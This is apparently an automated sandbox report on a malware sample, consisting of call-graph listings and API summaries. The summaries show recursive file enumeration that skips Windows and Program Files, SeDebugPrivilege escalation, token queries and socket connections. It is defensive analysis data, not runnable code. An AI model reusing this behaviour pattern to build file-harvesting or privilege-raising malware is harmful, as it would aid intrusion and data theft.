403c62 8292->8293 8294 403d4d 5 API calls 8293->8294 8295 403c6d 8294->8295 8296 403c72 8295->8296 8297 4031e5 4 API calls 8295->8297 8296->8278 8298 403c87 CreateDirectoryW 8297->8298 8298->8278 8300 4031e5 4 API calls 8299->8300 8301 4067ad 8300->8301 8301->8287 8303 4031e5 4 API calls 8302->8303 8304 403bc9 GetFileAttributesW 8303->8304 8304->8292 8306 405797 4 API calls 8305->8306 8307 4058a8 8306->8307 8307->8249 8307->8251 8309 4031e5 4 API calls 8308->8309 8310 403baa 8309->8310 8310->8136 8310->8140 9747 40ebc6 9748 4040bb 12 API calls 9747->9748 9749 40ebdf 9748->9749 9750 40ecd7 9749->9750 9767 407795 9749->9767 9753 40eccd 9754 403f9e 5 API calls 9753->9754 9754->9750 9755 4056bf 2 API calls 9765 40ec12 9755->9765 9756 40ecb5 9757 402bab 2 API calls 9756->9757 9758 40ecbd 9757->9758 9759 413aca 4 API calls 9758->9759 9760 40ecc7 9759->9760 9761 405695 2 API calls 9760->9761 9761->9753 9762 407908 GetProcessHeap RtlAllocateHeap 9762->9765 9764 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9764->9765 9765->9756 9765->9762 9765->9764 9766 402bab GetProcessHeap HeapFree 9765->9766 9778 412269 9765->9778 9766->9765 9768 4077ab 9767->9768 9774 4077b3 9768->9774 9785 405ae9 9768->9785 9770 4077e1 9771 4077f8 9770->9771 9773 407802 9770->9773 9770->9774 9772 402bab 2 API calls 9771->9772 9772->9774 9775 402b7c 2 API calls 9773->9775 9774->9753 9774->9755 9776 407811 9775->9776 9777 402bab 2 API calls 9776->9777 9777->9774 9801 40374e 9778->9801 9783 402bab 2 API calls 9784 412299 9783->9784 9784->9765 9786 405af7 9785->9786 9787 402b7c 2 API calls 9786->9787 9788 405b03 9787->9788 9797 405b5a 9788->9797 9798 405998 9788->9798 9790 405b21 9791 405b61 9790->9791 9793 402b7c 2 API calls 9790->9793 9792 402bab 2 API calls 9791->9792 9792->9797 9794 405b39 9793->9794 9794->9791 9795 405b40 9794->9795 9796 402bab 2 API calls 9795->9796 9796->9797 9797->9770 9799 4031e5 4 API calls 9798->9799 9800 4059ab 9799->9800 9800->9790 9802 402b7c 2 API calls 9801->9802 9804 40375f 9802->9804 9803 4037a3 9803->9784 9808 4037be 9803->9808 9804->9803 9805 4031e5 4 API calls 9804->9805 9806 40378f 9805->9806 9806->9803 9807 402bab 2 API calls 9806->9807 9807->9803 9809 4031e5 4 API calls 9808->9809 9810 4037e2 9809->9810 9811 40382b 9810->9811 9812 402b7c 2 API calls 9810->9812 9811->9783 9813 403802 9812->9813 9814 403832 9813->9814 9816 403809 9813->9816 9815 4036a3 4 API calls 9814->9815 9815->9811 9817 4036a3 4 API calls 9816->9817 9817->9811 8908 410cd1 8913 412093 8908->8913 8911 412093 20 API calls 8912 410cff 8911->8912 8915 4120a5 8913->8915 8934 410cf1 8913->8934 8914 4120b3 8916 404056 6 API calls 8914->8916 8915->8914 8920 412100 8915->8920 8917 4120ba 8916->8917 8918 405b6f 6 API calls 8917->8918 8919 412152 8917->8919 8917->8934 8922 412125 8918->8922 8935 403d74 8919->8935 8921 403fbf 7 API calls 8920->8921 8920->8934 8921->8917 8922->8919 8926 412139 8922->8926 8927 41214d 8922->8927 8925 41218c 8929 402bab 2 API calls 8925->8929 8925->8934 8931 402bab 2 API calls 8926->8931 8930 402bab 2 API calls 8927->8930 8928 402bab 2 API calls 8928->8925 8929->8934 8930->8919 8932 41213e 8931->8932 8933 402bab 2 API calls 8932->8933 8933->8934 8934->8911 8936 403d87 8935->8936 8937 403ea3 8936->8937 8938 405b6f 6 API calls 8936->8938 8939 405b6f 6 API calls 8937->8939 8940 403da3 8938->8940 8941 403eb9 8939->8941 8940->8937 8942 4031e5 4 API calls 8940->8942 8943 4031e5 4 API calls 8941->8943 8949 403f6f 8941->8949 8945 403dbc FindFirstFileW 8942->8945 8944 403ed3 FindFirstFileW 8943->8944 8961 403f8d 8944->8961 8965 403ee8 8944->8965 8956 403e9c 8945->8956 8966 403dd1 8945->8966 8946 402bab 2 API calls 8946->8949 8947 402bab 2 API calls 8947->8937 8948 4031e5 4 API calls 8950 403e84 FindNextFileW 8948->8950 8949->8925 8949->8928 8951 403e96 8950->8951 8950->8966 8975 403bef 8951->8975 8952 4031e5 4 API calls 8955 403f50 FindNextFileW 8952->8955 8954 405b6f 6 API calls 8954->8965 8958 403f87 8955->8958 8955->8965 8956->8947 8957 405b6f 6 API calls 8957->8966 8960 403bef 5 API calls 8958->8960 8959 403f75 8962 402bab 2 API calls 8959->8962 8960->8961 8961->8946 8964 403f7b 8962->8964 8963 403d74 15 API calls 8963->8966 8967 403bef 5 API calls 8964->8967 8965->8952 8965->8954 8965->8959 8968 402bab 2 API calls 8965->8968 8978 40fa23 8965->8978 8966->8948 8966->8957 8966->8963 8969 402bab 2 API calls 8966->8969 8970 403f63 8966->8970 8967->8949 8968->8965 8969->8966 8971 402bab 2 API calls 8970->8971 8972 403f69 8971->8972 8973 403bef 5 API calls 8972->8973 8973->8949 8976 4031e5 4 API calls 8975->8976 8977 403c01 FindClose 8976->8977 8977->8956 8979 40fa39 8978->8979 8980 410293 8979->8980 8981 405b6f 6 API calls 8979->8981 8980->8965 8982 40ffcc 8981->8982 8982->8980 8983 4040bb 12 API calls 8982->8983 8984 40ffeb 8983->8984 8985 41028c 8984->8985 8987 402b7c 2 API calls 8984->8987 9033 41027d 8984->9033 8986 402bab 2 API calls 8985->8986 8986->8980 8989 41001e 8987->8989 8988 403f9e 5 API calls 8988->8985 8990 40a423 4 API calls 8989->8990 8989->9033 8991 41004a 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 41005c 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 410079 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 410096 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100b0 8998->8999 9000 4031e5 4 API calls 8999->9000 9001 4100cd 9000->9001 9002 4031e5 4 API calls 9001->9002 9003 4100ea 9002->9003 9034 412516 9003->9034 9005 4100fd 9006 40642c 5 API calls 9005->9006 9007 41013e 9006->9007 9008 410142 9007->9008 9009 41019f 9007->9009 9010 40488c 5 API calls 9008->9010 9012 4031e5 4 API calls 9009->9012 9011 410151 9010->9011 9013 41019c 9011->9013 9014 404866 4 API calls 9011->9014 9027 4101bb 9012->9027 9015 40642c 5 API calls 9013->9015 9017 41022a 9013->9017 9016 410163 9014->9016 9018 410201 9015->9018 9019 406c4c 6 API calls 9016->9019 9031 41018e 9016->9031 9020 413a58 13 API calls 9017->9020 9022 410205 9018->9022 9023 41022f 9018->9023 9024 410178 9019->9024 9030 41026e 9020->9030 9021 403c40 5 API calls 9021->9013 9025 4126a7 7 API calls 9022->9025 9037 4125db 9023->9037 9029 406c4c 6 API calls 9024->9029 9025->9017 9028 4031e5 4 API calls 9027->9028 9028->9013 9029->9031 9032 402bab 2 API calls 9030->9032 9031->9021 9032->9033 9033->8988 9035 4031e5 4 API calls 9034->9035 9036 412539 9035->9036 9036->9005 9038 40488c 5 API calls 9037->9038 9039 4125ec 9038->9039 9040 41269f 9039->9040 9041 4031e5 4 API calls 9039->9041 9040->9017 9042 412609 9041->9042 9043 4031e5 4 API calls 9042->9043 9049 41268f 9042->9049 9045 41262a 9043->9045 9044 403c40 5 API calls 9044->9040 9046 412675 9045->9046 9054 4124f1 9045->9054 9047 4031e5 4 API calls 9046->9047 9047->9049 9049->9044 9051 412663 9053 4031e5 4 API calls 9051->9053 9052 4124f1 4 API calls 9052->9051 9053->9046 9055 4031e5 4 API calls 9054->9055 9056 412503 9055->9056 9056->9051 9056->9052 9243 4049dc 9244 4031e5 4 API calls 9243->9244 9245 4049ef 9244->9245 9900 40cddd 9901 405b6f 6 API calls 9900->9901 9902 40cdee 9901->9902 9903 40ce06 9902->9903 9904 413a58 13 API calls 9902->9904 9906 405b6f 6 API calls 9903->9906 9912 40ce59 9903->9912 9905 40ce00 9904->9905 9907 402bab 2 API calls 9905->9907 9908 40ce1c 9906->9908 9907->9903 9909 40ce52 9908->9909 9911 403d74 19 API calls 9908->9911 9908->9912 9910 402bab 2 API calls 9909->9910 9910->9912 9913 40ce45 9911->9913 9913->9909 9914 402bab 2 API calls 9913->9914 9914->9909 9246 40ecde 9247 412093 20 API calls 9246->9247 9248 40ecfd 9247->9248 9249 412093 20 API calls 9248->9249 9250 40ed0d 9249->9250 9254 40e8df 9255 412093 20 API calls 9254->9255 9256 40e8f8 9255->9256 9257 412093 20 API calls 9256->9257 9258 40e908 9257->9258 9265 404b22 9258->9265 9260 40e91c 9261 40e936 9260->9261 9264 40e93d 9260->9264 9272 40e944 9260->9272 9263 402bab 2 API calls 9261->9263 9263->9264 9266 402b7c 2 API calls 9265->9266 9267 404b33 9266->9267 9268 404b66 9267->9268 9281 4049b3 9267->9281 9268->9260 9271 402bab 2 API calls 9271->9268 9273 4056bf 2 API calls 9272->9273 9274 40e952 9273->9274 9275 4057df 13 API calls 9274->9275 9280 40e976 9274->9280 9276 40e966 9275->9276 9277 413aca 4 API calls 9276->9277 9278 40e970 9277->9278 9279 405695 2 API calls 9278->9279 9279->9280 9280->9261 9282 4031e5 4 API calls 9281->9282 9283 4049c6 9282->9283 9283->9268 9283->9271 9284 4139de 9293 413855 9284->9293 9286 4139f1 9287 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9286->9287 9289 4139f7 9287->9289 9288 413866 58 API calls 9290 413a2d 9288->9290 9289->9288 9291 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9290->9291 9292 413a34 9291->9292 9294 4031e5 4 API calls 9293->9294 9295 413864 9294->9295 9295->9295 9920 4116e7 9921 4117ba 9920->9921 9922 405b6f 6 API calls 9921->9922 9927 4117f1 9921->9927 9923 4117d0 9922->9923 9924 404cbf 8 API calls 9923->9924 9923->9927 9925 4117eb 9924->9925 9926 402bab 2 API calls 9925->9926 9926->9927 9315 4094e7 9316 404b22 6 API calls 9315->9316 9317 4094fe 9316->9317 9318 409554 9317->9318 9319 405b6f 6 API calls 9317->9319 9320 409514 9319->9320 9321 404b22 6 API calls 9320->9321 9327 40954d 9320->9327 9323 40952d 9321->9323 9322 402bab 2 API calls 9322->9318 9324 409408 15 API calls 9323->9324 9329 409544 9323->9329 9326 40953e 9324->9326 9325 402bab 2 API calls 9325->9327 9328 402bab 2 API calls 9326->9328 9327->9322 9328->9329 9329->9325 9338 4058ea 9339 4031e5 4 API calls 9338->9339 9340 4058fd StrStrA 9339->9340 9972 40d4ea 9973 404bee 6 API calls 9972->9973 9974 40d500 9973->9974 9975 40d5a0 9974->9975 9976 404bee 6 API calls 9974->9976 9977 40d529 9976->9977 9978 404bee 6 API calls 9977->9978 9979 40d537 9978->9979 9980 404bee 6 API calls 9979->9980 9981 40d546 9980->9981 9981->9975 9982 405872 4 API calls 9981->9982 9983 40d56d 9982->9983 9984 405872 4 API calls 9983->9984 9985 40d57c 9984->9985 9986 405872 4 API calls 9985->9986 9987 40d58e 9986->9987 9988 405872 4 API calls 9987->9988 9988->9975 9989 40a3ea 9990 40374e 6 API calls 9989->9990 9991 40a403 9990->9991 9992 40a419 9991->9992 9993 4059d8 4 API calls 9991->9993 9994 40a411 9993->9994 9995 402bab 2 API calls 9994->9995 9995->9992 9378 404df3 WSAStartup 9382 4091f6 9383 404b22 6 API calls 9382->9383 9384 40920b 9383->9384 9385 409222 9384->9385 9386 409408 15 API calls 9384->9386 9387 40921c 9386->9387 9388 402bab 2 API calls 9387->9388 9388->9385 10022 4117fe 10023 404c4e 6 API calls 10022->10023 10024 411888 10023->10024 10025 411925 10024->10025 10026 404c4e 6 API calls 10024->10026 10027 4118ab 10026->10027 10027->10025 10041 4119b3 10027->10041 10029 4118c5 10030 4119b3 4 API calls 10029->10030 10031 4118d0 10030->10031 10031->10025 10032 4056bf 2 API calls 10031->10032 10033 4118fd 10032->10033 10034 405872 4 API calls 10033->10034 10035 41190a 10034->10035 10036 405872 4 API calls 10035->10036 10037 411915 10036->10037 10038 413aca 4 API calls 10037->10038 10039 41191f 10038->10039 10040 405695 2 API calls 10039->10040 10040->10025 10042 4119c6 10041->10042 10044 4119bf 10041->10044 10043 4031e5 4 API calls 10042->10043 10043->10044 10044->10029 9392 40e880 9393 41219c 14 API calls 9392->9393 9394 40e88e 9393->9394 9395 41219c 14 API calls 9394->9395 9396 40e89c 9395->9396 10108 40e48a 10109 404bee 6 API calls 10108->10109 10110 40e4d0 10109->10110 10111 40e4f4 10110->10111 10112 405872 4 API calls 10110->10112 10112->10111 9493 410390 9494 404b22 6 API calls 9493->9494 9495 4103a5 9494->9495 9496 410409 9495->9496 9497 405b6f 6 API calls 9495->9497 9499 4103ba 9497->9499 9498 402bab 2 API calls 9498->9496 9501 410402 9499->9501 9502 403d74 19 API calls 9499->9502 9505 4103fb 9499->9505 9500 402bab 2 API calls 9500->9501 9501->9498 9503 4103ee 9502->9503 9504 402bab 2 API calls 9503->9504 9503->9505 9504->9505 9505->9500 10123 40ed96 10124 4040bb 12 API calls 10123->10124 10138 40edb0 10124->10138 10125 40ef90 10126 40ef87 10127 403f9e 5 API calls 10126->10127 10127->10125 10128 405ae9 6 API calls 10128->10138 10129 412269 6 API calls 10129->10138 10130 40ef61 10131 40ef6e 10130->10131 10132 402bab 2 API calls 10130->10132 10133 40ef7c 10131->10133 10134 402bab 2 API calls 10131->10134 10132->10131 10133->10126 10136 402bab 2 API calls 10133->10136 10134->10133 10135 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10135->10138 10136->10126 10137 402bab GetProcessHeap HeapFree 10137->10138 10138->10125 10138->10126 10138->10128 10138->10129 10138->10130 10138->10135 10138->10137 10139 40ef98 10140 404c4e 6 API calls 10139->10140 10141 40efb6 10140->10141 10153 40f02a 10141->10153 10154 40f054 10141->10154 10144 404bee 6 API calls 10145 40efda 10144->10145 10146 404bee 6 API calls 10145->10146 10147 40efe9 10146->10147 10148 405872 4 API calls 10147->10148 10147->10153 10149 40f008 10148->10149 10150 405872 4 API calls 10149->10150 10151 40f01a 10150->10151 10152 405872 4 API calls 10151->10152 10152->10153 10155 40f064 10154->10155 10156 402b7c 2 API calls 10155->10156 10158 40f072 10156->10158 10157 40efca 10157->10144 10158->10157 10160 405ecd 10158->10160 10161 4059b8 4 API calls 10160->10161 10162 405edf 10161->10162 10162->10158 9512 410c98 9513 41219c 14 API calls 9512->9513 9514 410ca8 9513->9514 9515 41219c 14 API calls 9514->9515 9516 410cb5 9515->9516 9517 412093 20 API calls 9516->9517 9518 410cc9 9517->9518 10232 41249c 10233 4056bf 2 API calls 10232->10233 10234 4124aa 10233->10234 10235 4057df 13 API calls 10234->10235 10240 4124ce 10234->10240 10236 4124be 10235->10236 10237 413aca 4 API calls 10236->10237 10238 4124c8 10237->10238 10239 405695 2 API calls 10238->10239 10239->10240 9522 40f49e 9523 40f4b6 13 API calls 9522->9523 9524 40f4a8 9523->9524 9525 40929e 9526 413b28 6 API calls 9525->9526 9527 4092a4 9526->9527 9528 405b6f 6 API calls 9527->9528 9529 4092af 9528->9529 9530 4092c5 9529->9530 9531 409408 15 API calls 9529->9531 9532 4092bf 9531->9532 9533 402bab 2 API calls 9532->9533 9533->9530 10259 407fa4 10260 407fb7 10259->10260 10261 402b7c 2 API calls 10260->10261 10263 407fee 10260->10263 10262 40800d 10261->10262 10262->10263 10264 4037be 4 API calls 10262->10264 10265 40803c 10264->10265 10266 402bab 2 API calls 10265->10266 10266->10263 9570 4090aa 9571 404b22 6 API calls 9570->9571 9572 4090c1 9571->9572 9573 4090d8 9572->9573 9574 409408 15 API calls 9572->9574 9575 404b22 6 API calls 9573->9575 9576 4090d2 9574->9576 9577 4090eb 9575->9577 9578 402bab 2 API calls 9576->9578 9579 408c4d 15 API calls 9577->9579 9582 409104 9577->9582 9578->9573 9580 4090fe 9579->9580 9581 402bab 2 API calls 9580->9581 9581->9582 9589 409cae 9604 404b79 9589->9604 9591 409cc5 9592 409d27 9591->9592 9594 405b6f 6 API calls 9591->9594 9595 409d2f 9591->9595 9593 402bab 2 API calls 9592->9593 9593->9595 9596 409cec 9594->9596 9596->9592 9597 404b79 6 API calls 9596->9597 9598 409d05 9597->9598 9599 409d1e 9598->9599 9600 408c4d 15 API calls 9598->9600 9601 402bab 2 API calls 9599->9601 9602 409d18 9600->9602 9601->9592 9603 402bab 2 API calls 9602->9603 9603->9599 9605 404b22 6 API calls 9604->9605 9606 404b8a 9605->9606 9606->9591 10326 411fb3 10327 405b6f 6 API calls 10326->10327 10328 412013 10327->10328 10331 412075 10328->10331 10333 41206a 10328->10333 10345 411a8d 10328->10345 10330 402bab 2 API calls 10330->10331 10333->10330 10334 4056bf 2 API calls 10335 41203d 10334->10335 10336 405872 4 API calls 10335->10336 10337 41204a 10336->10337 10338 413aca 4 API calls 10337->10338 10339 412054 10338->10339 10340 405695 2 API calls 10339->10340 10341 41205a 10340->10341 10342 413a58 13 API calls 10341->10342 10343 412064 10342->10343 10344 402bab 2 API calls 10343->10344 10344->10333 10346 402b7c 2 API calls 10345->10346 10347 411aa3 10346->10347 10355 411f05 10347->10355 10368 404ada 10347->10368 10350 404ada 4 API calls 10351 411cad 10350->10351 10352 411f0c 10351->10352 10353 411cc0 10351->10353 10354 402bab 2 API calls 10352->10354 10371 405eb6 10353->10371 10354->10355 10355->10333 10355->10334 10357 411d3c 10358 4031e5 4 API calls 10357->10358 10366 411d7b 10358->10366 10359 411ea6 10360 4031e5 4 API calls 10359->10360 10361 411eb5 10360->10361 10362 4031e5 4 API calls 10361->10362 10363 411ed6 10362->10363 10364 405eb6 4 API calls 10363->10364 10364->10355 10365 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10365->10366 10366->10359 10366->10365 10367 405eb6 4 API calls 10366->10367 10367->10366 10369 4031e5 4 API calls 10368->10369 10370 404afd 10369->10370 10370->10350 10372 405998 4 API calls 10371->10372 10373 405ec8 10372->10373 10373->10357 9636 40f6b8 9637 41219c 14 API calls 9636->9637 9638 40f6c7 9637->9638 9639 41219c 14 API calls 9638->9639 9640 40f6d5 9639->9640 9641 41219c 14 API calls 9640->9641 9642 40f6df 9641->9642 9661 40d6bd 9662 4056bf 2 API calls 9661->9662 9663 40d6c9 9662->9663 9674 404cbf 9663->9674 9666 404cbf 8 API calls 9667 40d6f4 9666->9667 9668 404cbf 8 API calls 9667->9668 9669 40d702 9668->9669 9670 413aca 4 API calls 9669->9670 9671 40d711 9670->9671 9672 405695 2 API calls 9671->9672 9673 40d71f 9672->9673 9675 402b7c 2 API calls 9674->9675 9676 404ccd 9675->9676 9677 404ddc 9676->9677 9678 404b8f 5 API calls 9676->9678 9677->9666 9679 404ce4 9678->9679 9680 404dd4 9679->9680 9682 402b7c 2 API calls 9679->9682 9681 402bab 2 API calls 9680->9681 9681->9677 9689 404d04 9682->9689 9683 404dcc 9684 404a39 5 API calls 9683->9684 9684->9680 9685 404dc6 9686 402bab 2 API calls 9685->9686 9686->9683 9687 402b7c 2 API calls 9687->9689 9688 404b8f 5 API calls 9688->9689 9689->9683 9689->9685 9689->9687 9689->9688 9690 404a39 5 API calls 9689->9690 9691 405b6f 6 API calls 9689->9691 9692 404cbf 8 API calls 9689->9692 9693 402bab GetProcessHeap HeapFree 9689->9693 9690->9689 9691->9689 9692->9689 9693->9689 9694 40f0bf 9695 4056bf 2 API calls 9694->9695 9696 40f0c9 9695->9696 9698 404cbf 8 API calls 9696->9698 9706 40f115 9696->9706 9697 41219c 14 API calls 9699 40f128 9697->9699 9700 40f0ed 9698->9700 9701 404cbf 8 API calls 9700->9701 9702 40f0fb 9701->9702 9703 413aca 4 API calls 9702->9703 9704 40f10a 9703->9704 9705 405695 2 API calls 9704->9705 9705->9706 9706->9697

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileFind$FirstNext
                                                                                    • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                    • API String ID: 1690352074-2009209621
                                                                                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 3615134276-2896544425
                                                                                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1357844191-0
                                                                                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                                    APIs
                                                                                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: recv
                                                                                    • String ID:
                                                                                    • API String ID: 1507349165-0
                                                                                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                    • _wmemset.LIBCMT ref: 00406244
                                                                                    • _wmemset.LIBCMT ref: 00406261
                                                                                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _wmemset$ErrorInformationLastToken
                                                                                    • String ID: IDA$IDA
                                                                                    • API String ID: 487585393-2020647798
                                                                                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                                                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                                                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 548 404ec0-404ec6 call 402bab 545->548 549 404ecb 545->549 546->545 548->554 553 404ecd-404ece 549->553 553->539 554->553
